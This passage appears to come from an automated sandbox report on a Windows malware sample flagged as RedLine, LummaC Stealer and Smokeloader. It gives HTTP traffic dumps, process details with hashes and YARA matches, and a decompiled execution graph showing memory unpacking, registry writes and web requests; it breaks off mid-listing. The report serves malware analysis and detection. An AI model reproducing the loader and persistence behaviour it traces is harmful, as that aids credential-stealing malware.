                                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                              2024-12-14 13:13:02 UTC10097INData Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55
                                                                                                                                                                                                                                                              Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
                                                                                                                                                                                                                                                              2024-12-14 13:13:02 UTC10555INData Raw: 3b 57 45 42 5f 55 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75
                                                                                                                                                                                                                                                              Data Ascii: ;WEB_UNIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&qu


                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                              Start time:08:12:40
                                                                                                                                                                                                                                                              Start date:14/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\TN78WX7nJU.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\TN78WX7nJU.exe"
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              File size:457'216 bytes
                                                                                                                                                                                                                                                              MD5 hash:E1C246E51C4460E34A3429A6FC397942
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4215370096.00000000009BA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                                              Start time:08:12:48
                                                                                                                                                                                                                                                              Start date:14/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\C455.tmp.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\C455.tmp.exe"
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              File size:361'984 bytes
                                                                                                                                                                                                                                                              MD5 hash:D88E2431ABAC06BDF0CD03C034B3E5E3
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2221850742.0000000000AFA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000003.1874232972.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                              • Detection: 42%, ReversingLabs
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                                              Start time:08:13:03
                                                                                                                                                                                                                                                              Start date:14/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 1684
                                                                                                                                                                                                                                                              Imagebase:0x500000
                                                                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:2.1%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:3.8%
                                                                                                                                                                                                                                                                Signature Coverage:5.8%
                                                                                                                                                                                                                                                                Total number of Nodes:736
                                                                                                                                                                                                                                                                Total number of Limit Nodes:21
                                                                                                                                                                                                                                                                execution_graph 63753 402c04 InternetOpenW 63754 402e55 63753->63754 63757 402c37 ListArray 63753->63757 63774 40f8cf 63754->63774 63756 402e64 63765 42defd 63757->63765 63760 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 63761 402e17 63760->63761 63762 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 63761->63762 63763 402e29 InternetOpenUrlW 63762->63763 63763->63754 63764 402e44 InternetCloseHandle InternetCloseHandle 63763->63764 63764->63754 63766 42df1a 63765->63766 63767 42df0c 63765->63767 63781 42eac9 20 API calls __dosmaperr 63766->63781 63767->63766 63772 42df4a 63767->63772 63769 42df24 63782 42a59d 26 API calls _Deallocate 63769->63782 63771 402e09 63771->63760 63772->63771 63783 42eac9 20 API calls __dosmaperr 63772->63783 63775 40f8d8 63774->63775 63776 40f8da IsProcessorFeaturePresent 63774->63776 63775->63756 63778 40f94d 63776->63778 63784 40f911 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 63778->63784 63780 40fa30 63780->63756 63781->63769 63782->63771 63783->63769 63784->63780 63785 248003c 63786 2480049 63785->63786 63800 2480e0f SetErrorMode SetErrorMode 63786->63800 63791 2480265 63792 24802ce VirtualProtect 63791->63792 63794 248030b 63792->63794 63793 2480439 VirtualFree 63798 24804be 63793->63798 63799 24805f4 LoadLibraryA 63793->63799 63794->63793 63795 24804e3 LoadLibraryA 63795->63798 63797 24808c7 63798->63795 63798->63799 63799->63797 63801 2480223 63800->63801 63802 2480d90 63801->63802 63803 2480dad 63802->63803 63804 2480dbb GetPEB 63803->63804 63805 2480238 VirtualAlloc 63803->63805 63804->63805 63805->63791 63806 40fc06 63807 40fc12 CallCatchBlock 63806->63807 63835 40fff3 63807->63835 63809 40fc19 63810 40fd6c 63809->63810 63813 40fc43 63809->63813 63856 4104d3 4 API calls 2 library calls 63810->63856 63812 40fd73 63857 42ffc9 28 API calls _Atexit 63812->63857 63815 40fc82 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 63813->63815 63850 42fcee 5 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 63813->63850 63823 40fce3 63815->63823 63852 42a366 167 API calls 4 library calls 63815->63852 63816 40fd79 63858 42ff7b 28 API calls _Atexit 63816->63858 63819 40fc5c 63821 40fc62 63819->63821 63851 42fc92 5 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 63819->63851 63820 40fd81 63846 4105ed 63823->63846 63826 40fce9 63827 40fcfe 63826->63827 63853 410623 GetModuleHandleW 63827->63853 63829 40fd05 63829->63812 63830 40fd09 63829->63830 63831 40fd12 63830->63831 63854 42ff6c 28 API calls _Atexit 63830->63854 63855 410182 13 API calls 2 library calls 63831->63855 63834 40fd1a 63834->63821 63836 40fffc 63835->63836 63859 41077b IsProcessorFeaturePresent 63836->63859 63838 410008 63860 428827 10 API calls 3 library calls 63838->63860 63840 41000d 63845 410011 63840->63845 63861 4317a1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 63840->63861 63842 41001a 63843 410028 63842->63843 63862 428850 8 API calls 3 library calls 63842->63862 63843->63809 63845->63809 63863 426830 63846->63863 63849 410613 63849->63826 63850->63819 63851->63815 63852->63823 63853->63829 63854->63831 63855->63834 63856->63812 63857->63816 63858->63820 63859->63838 63860->63840 63861->63842 63862->63845 63864 410600 GetStartupInfoW 63863->63864 63864->63849 63865 432785 63870 432553 63865->63870 63868 4327ad 63871 43257e 63870->63871 63878 4326c7 63871->63878 63885 43c8ce 170 API calls 2 library calls 63871->63885 63873 432771 63889 42a59d 26 API calls _Deallocate 63873->63889 63875 4326d0 63875->63868 63882 43d01c 63875->63882 63877 432711 63877->63878 63886 43c8ce 170 API calls 2 library calls 63877->63886 63878->63875 63888 42eac9 20 API calls __dosmaperr 63878->63888 63880 432730 63880->63878 63887 43c8ce 170 API calls 2 library calls 63880->63887 63890 43c9f1 63882->63890 63884 43d037 63884->63868 63885->63877 63886->63880 63887->63878 63888->63873 63889->63875 63893 43c9fd CallCatchBlock 63890->63893 63891 43ca0b 63908 42eac9 20 API calls __dosmaperr 63891->63908 63893->63891 63895 43ca44 63893->63895 63894 43ca10 63909 42a59d 26 API calls _Deallocate 63894->63909 63901 43cfcb 63895->63901 63900 43ca1a __wsopen_s 63900->63884 63911 43f941 63901->63911 63904 43ca68 63910 43ca91 LeaveCriticalSection __wsopen_s 63904->63910 63908->63894 63909->63900 63910->63900 63912 43f964 63911->63912 63913 43f94d 63911->63913 63915 43f983 63912->63915 63916 43f96c 63912->63916 63987 42eac9 20 API calls __dosmaperr 63913->63987 63991 434faa 10 API calls 2 library calls 63915->63991 63989 42eac9 20 API calls __dosmaperr 63916->63989 63917 43f952 63988 42a59d 26 API calls _Deallocate 63917->63988 63921 43f971 63990 42a59d 26 API calls _Deallocate 63921->63990 63922 43f98a MultiByteToWideChar 63924 43f9b9 63922->63924 63925 43f9a9 GetLastError 63922->63925 63993 4336a7 21 API calls 3 library calls 63924->63993 63992 42ea93 20 API calls 2 library calls 63925->63992 63928 43cfe1 63928->63904 63935 43d03c 63928->63935 63929 43f9c1 63930 43f9c8 MultiByteToWideChar 63929->63930 63934 43f9e9 63929->63934 63931 43f9dd GetLastError 63930->63931 63930->63934 63994 42ea93 20 API calls 2 library calls 63931->63994 63932 43346a _free 20 API calls 63932->63928 63934->63932 63936 43d059 63935->63936 63937 43d087 63936->63937 63938 43d06e 63936->63938 63995 43977e 63937->63995 64009 42eab6 20 API calls __dosmaperr 63938->64009 63941 43d08c 63942 43d095 63941->63942 63943 43d0ac 63941->63943 64011 42eab6 20 API calls __dosmaperr 63942->64011 64008 43cd0a CreateFileW 63943->64008 63947 43d009 63981 43346a 63947->63981 63948 43d09a 64012 42eac9 20 API calls __dosmaperr 63948->64012 63949 43d162 GetFileType 63952 43d1b4 63949->63952 63953 43d16d GetLastError 63949->63953 63951 43d137 GetLastError 64014 42ea93 20 API calls 2 library calls 63951->64014 64017 4396c7 21 API calls 3 library calls 63952->64017 64015 42ea93 20 API calls 2 library calls 63953->64015 63954 43d073 64010 42eac9 20 API calls __dosmaperr 63954->64010 63955 43d0e5 63955->63949 63955->63951 64013 43cd0a CreateFileW 63955->64013 63959 43d17b CloseHandle 63959->63954 63962 43d1a4 63959->63962 63961 43d12a 63961->63949 63961->63951 64016 42eac9 20 API calls __dosmaperr 63962->64016 63964 43d1d5 63966 43d221 63964->63966 64018 43cf1b 169 API calls 4 library calls 63964->64018 63965 43d1a9 63965->63954 63970 43d24e 63966->63970 64019 43cabd 167 API calls 4 library calls 63966->64019 63969 43d247 63969->63970 63971 43d25f 63969->63971 64020 4335cd 29 API calls 2 library calls 63970->64020 63971->63947 63973 43d2dd CloseHandle 63971->63973 64021 43cd0a CreateFileW 63973->64021 63975 43d308 63976 43d312 GetLastError 63975->63976 63980 43d257 63975->63980 64022 42ea93 20 API calls 2 library calls 63976->64022 63978 43d31e 64023 439890 21 API calls 3 library calls 63978->64023 63980->63947 63982 433475 HeapFree 63981->63982 63986 43349e __dosmaperr 63981->63986 63983 43348a 63982->63983 63982->63986 64031 42eac9 20 API calls __dosmaperr 63983->64031 63985 433490 GetLastError 63985->63986 63986->63904 63987->63917 63988->63928 63989->63921 63990->63928 63991->63922 63992->63928 63993->63929 63994->63934 63996 43978a CallCatchBlock 63995->63996 64024 42e3ed EnterCriticalSection 63996->64024 63998 439791 64000 4397b6 63998->64000 64004 439824 EnterCriticalSection 63998->64004 64006 4397d8 63998->64006 64028 43955d 21 API calls 3 library calls 64000->64028 64001 439801 __wsopen_s 64001->63941 64003 4397bb 64003->64006 64029 4396a4 EnterCriticalSection 64003->64029 64004->64006 64007 439831 LeaveCriticalSection 64004->64007 64025 439887 64006->64025 64007->63998 64008->63955 64009->63954 64010->63947 64011->63948 64012->63954 64013->63961 64014->63954 64015->63959 64016->63965 64017->63964 64018->63966 64019->63969 64020->63980 64021->63975 64022->63978 64023->63980 64024->63998 64030 42e435 LeaveCriticalSection 64025->64030 64027 43988e 64027->64001 64028->64003 64029->64006 64030->64027 64031->63985 64032 43410a 64033 434116 CallCatchBlock 64032->64033 64034 434122 64033->64034 64035 434139 64033->64035 64066 42eac9 20 API calls __dosmaperr 64034->64066 64045 42caff EnterCriticalSection 64035->64045 64038 434127 64067 42a59d 26 API calls _Deallocate 64038->64067 64039 434149 64046 434186 64039->64046 64042 434155 64068 43417c LeaveCriticalSection __fread_nolock 64042->64068 64044 434132 __wsopen_s 64045->64039 64047 434194 64046->64047 64048 4341ae 64046->64048 64079 42eac9 20 API calls __dosmaperr 64047->64079 64069 432908 64048->64069 64051 4341b7 64076 4347d3 64051->64076 64052 434199 64080 42a59d 26 API calls _Deallocate 64052->64080 64054 4341a4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 64054->64042 64057 4342bb 64059 4342c8 64057->64059 64063 43426e 64057->64063 64058 43423f 64060 43425c 64058->64060 64058->64063 64082 42eac9 20 API calls __dosmaperr 64059->64082 64081 43449f 31 API calls 4 library calls 64060->64081 64063->64054 64083 43431b 30 API calls 2 library calls 64063->64083 64064 434266 64064->64054 64066->64038 64067->64044 64068->64044 64070 432914 64069->64070 64071 432929 64069->64071 64084 42eac9 20 API calls __dosmaperr 64070->64084 64071->64051 64073 432919 64085 42a59d 26 API calls _Deallocate 64073->64085 64075 432924 64075->64051 64086 434650 64076->64086 64078 4341d3 64078->64054 64078->64057 64078->64058 64079->64052 64080->64054 64081->64064 64082->64054 64083->64054 64084->64073 64085->64075 64087 43465c CallCatchBlock 64086->64087 64088 434664 64087->64088 64089 43467c 64087->64089 64121 42eab6 20 API calls __dosmaperr 64088->64121 64091 434730 64089->64091 64096 4346b4 64089->64096 64126 42eab6 20 API calls __dosmaperr 64091->64126 64092 434669 64122 42eac9 20 API calls __dosmaperr 64092->64122 64095 434735 64127 42eac9 20 API calls __dosmaperr 64095->64127 64111 4396a4 EnterCriticalSection 64096->64111 64099 43473d 64128 42a59d 26 API calls _Deallocate 64099->64128 64100 4346ba 64102 4346f3 64100->64102 64103 4346de 64100->64103 64112 434755 64102->64112 64123 42eac9 20 API calls __dosmaperr 64103->64123 64105 434671 __wsopen_s 64105->64078 64107 4346e3 64124 42eab6 20 API calls __dosmaperr 64107->64124 64108 4346ee 64125 434728 LeaveCriticalSection __wsopen_s 64108->64125 64111->64100 64129 439921 64112->64129 64114 434767 64115 434780 SetFilePointerEx 64114->64115 64116 43476f 64114->64116 64118 434798 GetLastError 64115->64118 64120 434774 64115->64120 64142 42eac9 20 API calls __dosmaperr 64116->64142 64143 42ea93 20 API calls 2 library calls 64118->64143 64120->64108 64121->64092 64122->64105 64123->64107 64124->64108 64125->64105 64126->64095 64127->64099 64128->64105 64130 439943 64129->64130 64131 43992e 64129->64131 64136 439968 64130->64136 64146 42eab6 20 API calls __dosmaperr 64130->64146 64144 42eab6 20 API calls __dosmaperr 64131->64144 64133 439933 64145 42eac9 20 API calls __dosmaperr 64133->64145 64136->64114 64137 439973 64147 42eac9 20 API calls __dosmaperr 64137->64147 64138 43993b 64138->64114 64140 43997b 64148 42a59d 26 API calls _Deallocate 64140->64148 64142->64120 64143->64120 64144->64133 64145->64138 64146->64137 64147->64140 64148->64138 64149 9babc6 64150 9babd5 64149->64150 64153 9bb366 64150->64153 64155 9bb381 64153->64155 64154 9bb38a CreateToolhelp32Snapshot 64154->64155 64156 9bb3a6 Module32First 64154->64156 64155->64154 64155->64156 64157 9babde 64156->64157 64158 9bb3b5 64156->64158 64160 9bb025 64158->64160 64161 9bb050 64160->64161 64162 9bb099 64161->64162 64163 9bb061 VirtualAlloc 64161->64163 64162->64162 64163->64162 64164 4332de 64165 433303 64164->64165 64166 4332eb 64164->64166 64170 43335e 64165->64170 64178 4332fb 64165->64178 64216 434ccd 21 API calls 2 library calls 64165->64216 64214 42eac9 20 API calls __dosmaperr 64166->64214 64168 4332f0 64215 42a59d 26 API calls _Deallocate 64168->64215 64172 432908 __fread_nolock 26 API calls 64170->64172 64173 433376 64172->64173 64184 432e16 64173->64184 64175 43337d 64176 432908 __fread_nolock 26 API calls 64175->64176 64175->64178 64177 4333a9 64176->64177 64177->64178 64179 432908 __fread_nolock 26 API calls 64177->64179 64180 4333b7 64179->64180 64180->64178 64181 432908 __fread_nolock 26 API calls 64180->64181 64182 4333c7 64181->64182 64183 432908 __fread_nolock 26 API calls 64182->64183 64183->64178 64185 432e22 CallCatchBlock 64184->64185 64186 432e42 64185->64186 64187 432e2a 64185->64187 64189 432f08 64186->64189 64194 432e7b 64186->64194 64283 42eab6 20 API calls __dosmaperr 64187->64283 64290 42eab6 20 API calls __dosmaperr 64189->64290 64191 432e2f 64284 42eac9 20 API calls __dosmaperr 64191->64284 64192 432f0d 64291 42eac9 20 API calls __dosmaperr 64192->64291 64195 432e8a 64194->64195 64196 432e9f 64194->64196 64285 42eab6 20 API calls __dosmaperr 64195->64285 64217 4396a4 EnterCriticalSection 64196->64217 64200 432e97 64292 42a59d 26 API calls _Deallocate 64200->64292 64201 432e8f 64286 42eac9 20 API calls __dosmaperr 64201->64286 64202 432ea5 64204 432ec1 64202->64204 64205 432ed6 64202->64205 64287 42eac9 20 API calls __dosmaperr 64204->64287 64218 432f29 64205->64218 64207 432e37 __wsopen_s 64207->64175 64210 432ec6 64288 42eab6 20 API calls __dosmaperr 64210->64288 64211 432ed1 64289 432f00 LeaveCriticalSection __wsopen_s 64211->64289 64214->64168 64215->64178 64216->64170 64217->64202 64219 432f53 64218->64219 64220 432f3b 64218->64220 64222 4332bd 64219->64222 64227 432f98 64219->64227 64302 42eab6 20 API calls __dosmaperr 64220->64302 64320 42eab6 20 API calls __dosmaperr 64222->64320 64223 432f40 64303 42eac9 20 API calls __dosmaperr 64223->64303 64226 4332c2 64321 42eac9 20 API calls __dosmaperr 64226->64321 64229 432fa3 64227->64229 64232 432f48 64227->64232 64234 432fd3 64227->64234 64304 42eab6 20 API calls __dosmaperr 64229->64304 64230 432fb0 64322 42a59d 26 API calls _Deallocate 64230->64322 64232->64211 64233 432fa8 64305 42eac9 20 API calls __dosmaperr 64233->64305 64237 432fec 64234->64237 64238 433012 64234->64238 64239 43302e 64234->64239 64237->64238 64243 432ff9 64237->64243 64306 42eab6 20 API calls __dosmaperr 64238->64306 64309 4336a7 21 API calls 3 library calls 64239->64309 64242 433017 64307 42eac9 20 API calls __dosmaperr 64242->64307 64293 43d365 64243->64293 64244 433045 64247 43346a _free 20 API calls 64244->64247 64250 43304e 64247->64250 64248 43301e 64308 42a59d 26 API calls _Deallocate 64248->64308 64249 433197 64252 43320d 64249->64252 64255 4331b0 GetConsoleMode 64249->64255 64253 43346a _free 20 API calls 64250->64253 64254 433211 ReadFile 64252->64254 64256 433055 64253->64256 64257 433285 GetLastError 64254->64257 64258 43322b 64254->64258 64255->64252 64259 4331c1 64255->64259 64260 43307a 64256->64260 64261 43305f 64256->64261 64262 433292 64257->64262 64263 4331e9 64257->64263 64258->64257 64264 433202 64258->64264 64259->64254 64265 4331c7 ReadConsoleW 64259->64265 64312 4347ee 64260->64312 64310 42eac9 20 API calls __dosmaperr 64261->64310 64318 42eac9 20 API calls __dosmaperr 64262->64318 64280 433029 __fread_nolock 64263->64280 64315 42ea93 20 API calls 2 library calls 64263->64315 64276 433250 64264->64276 64277 433267 64264->64277 64264->64280 64265->64264 64270 4331e3 GetLastError 64265->64270 64266 43346a _free 20 API calls 64266->64232 64270->64263 64272 433064 64311 42eab6 20 API calls __dosmaperr 64272->64311 64273 433297 64319 42eab6 20 API calls __dosmaperr 64273->64319 64316 432c45 31 API calls 3 library calls 64276->64316 64278 43327e 64277->64278 64277->64280 64317 432a85 29 API calls __fread_nolock 64278->64317 64280->64266 64282 433283 64282->64280 64283->64191 64284->64207 64285->64201 64286->64200 64287->64210 64288->64211 64289->64207 64290->64192 64291->64200 64292->64207 64294 43d372 64293->64294 64295 43d37f 64293->64295 64323 42eac9 20 API calls __dosmaperr 64294->64323 64298 43d38b 64295->64298 64324 42eac9 20 API calls __dosmaperr 64295->64324 64297 43d377 64297->64249 64298->64249 64300 43d3ac 64325 42a59d 26 API calls _Deallocate 64300->64325 64302->64223 64303->64232 64304->64233 64305->64230 64306->64242 64307->64248 64308->64280 64309->64244 64310->64272 64311->64280 64313 434755 __fread_nolock 28 API calls 64312->64313 64314 434804 64313->64314 64314->64243 64315->64280 64316->64280 64317->64282 64318->64273 64319->64280 64320->64226 64321->64230 64322->64232 64323->64297 64324->64300 64325->64297 64326 402bad RegCreateKeyExW 64327 402bdb RegSetValueExW 64326->64327 64328 402bef 64326->64328 64327->64328 64329 402bf4 RegCloseKey 64328->64329 64330 402bfd 64328->64330 64329->64330 64331 404b8e 64332 404b9a Concurrency::details::SchedulerBase::SchedulerBase 64331->64332 64337 40fb0c 64332->64337 64336 404bba messages Concurrency::details::SchedulerBase::SchedulerBase 64339 40fb11 64337->64339 64340 404ba3 64339->64340 64342 40fb2d Concurrency::details::SchedulerProxy::CreateOversubscriber 64339->64342 64361 42ad7e 64339->64361 64368 42f450 7 API calls 2 library calls 64339->64368 64345 4051d0 64340->64345 64369 42860d RaiseException 64342->64369 64344 4103cc 64346 4051dc __Cnd_init Concurrency::details::SchedulerBase::SchedulerBase 64345->64346 64348 4051f4 __Mtx_init 64346->64348 64380 40ce32 28 API calls std::_Throw_Cpp_error 64346->64380 64349 40521b 64348->64349 64381 40ce32 28 API calls std::_Throw_Cpp_error 64348->64381 64372 4010ea 64349->64372 64355 40526a 64356 40527f messages 64355->64356 64383 401128 28 API calls std::_Cnd_waitX 64355->64383 64384 401109 64356->64384 64360 4052a4 Concurrency::details::SchedulerBase::SchedulerBase 64360->64336 64366 4336a7 std::_Locinfo::_Locinfo_ctor 64361->64366 64362 4336e5 64371 42eac9 20 API calls __dosmaperr 64362->64371 64364 4336d0 RtlAllocateHeap 64365 4336e3 64364->64365 64364->64366 64365->64339 64366->64362 64366->64364 64370 42f450 7 API calls 2 library calls 64366->64370 64368->64339 64369->64344 64370->64366 64371->64365 64388 40d313 64372->64388 64375 401103 64377 40cef3 64375->64377 64412 42e114 64377->64412 64380->64348 64381->64349 64382 40ce32 28 API calls std::_Throw_Cpp_error 64382->64355 64383->64355 64385 401115 __Mtx_unlock 64384->64385 64387 401122 64385->64387 64737 40ce32 28 API calls std::_Throw_Cpp_error 64385->64737 64387->64360 64392 40d06d 64388->64392 64391 40ce32 28 API calls std::_Throw_Cpp_error 64391->64375 64393 40d0c3 64392->64393 64394 40d095 GetCurrentThreadId 64392->64394 64395 40d0c7 GetCurrentThreadId 64393->64395 64396 40d0ed 64393->64396 64397 40d0a0 GetCurrentThreadId 64394->64397 64407 40d0bb 64394->64407 64399 40d0d6 64395->64399 64398 40d186 GetCurrentThreadId 64396->64398 64402 40d10d 64396->64402 64397->64407 64398->64399 64400 40d1dd GetCurrentThreadId 64399->64400 64399->64407 64400->64407 64401 40f8cf __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 64405 4010f6 64401->64405 64410 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 64402->64410 64405->64375 64405->64391 64406 40d145 GetCurrentThreadId 64406->64399 64408 40d118 __Xtime_diff_to_millis2 64406->64408 64407->64401 64408->64399 64408->64406 64408->64407 64411 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 64408->64411 64410->64408 64411->64408 64413 42e121 64412->64413 64414 42e135 64412->64414 64435 42eac9 20 API calls __dosmaperr 64413->64435 64426 42e0cb 64414->64426 64417 42e126 64436 42a59d 26 API calls _Deallocate 64417->64436 64420 42e14a CreateThread 64421 42e169 GetLastError 64420->64421 64425 42e175 64420->64425 64457 42dfc0 64420->64457 64437 42ea93 20 API calls 2 library calls 64421->64437 64423 405257 64423->64355 64423->64382 64438 42e03d 64425->64438 64446 434d2a 64426->64446 64429 43346a _free 20 API calls 64430 42e0e4 64429->64430 64431 42e103 64430->64431 64432 42e0eb GetModuleHandleExW 64430->64432 64433 42e03d __Thrd_start 22 API calls 64431->64433 64432->64431 64434 42e10d 64433->64434 64434->64420 64434->64425 64435->64417 64436->64423 64437->64425 64439 42e04a 64438->64439 64440 42e06e 64438->64440 64441 42e050 CloseHandle 64439->64441 64442 42e059 64439->64442 64440->64423 64441->64442 64443 42e068 64442->64443 64444 42e05f FreeLibrary 64442->64444 64445 43346a _free 20 API calls 64443->64445 64444->64443 64445->64440 64447 434d37 64446->64447 64448 434d77 64447->64448 64449 434d62 HeapAlloc 64447->64449 64454 434d4b std::_Locinfo::_Locinfo_ctor 64447->64454 64456 42eac9 20 API calls __dosmaperr 64448->64456 64450 434d75 64449->64450 64449->64454 64452 42e0db 64450->64452 64452->64429 64454->64448 64454->64449 64455 42f450 7 API calls 2 library calls 64454->64455 64455->64454 64456->64452 64458 42dfcc _Atexit 64457->64458 64459 42dfd3 GetLastError ExitThread 64458->64459 64460 42dfe0 64458->64460 64473 431eda GetLastError 64460->64473 64462 42dfe5 64493 435571 64462->64493 64465 42dffb 64500 401169 64465->64500 64474 431ef0 64473->64474 64475 431ef6 64473->64475 64508 435111 11 API calls 2 library calls 64474->64508 64476 434d2a __Toupper 20 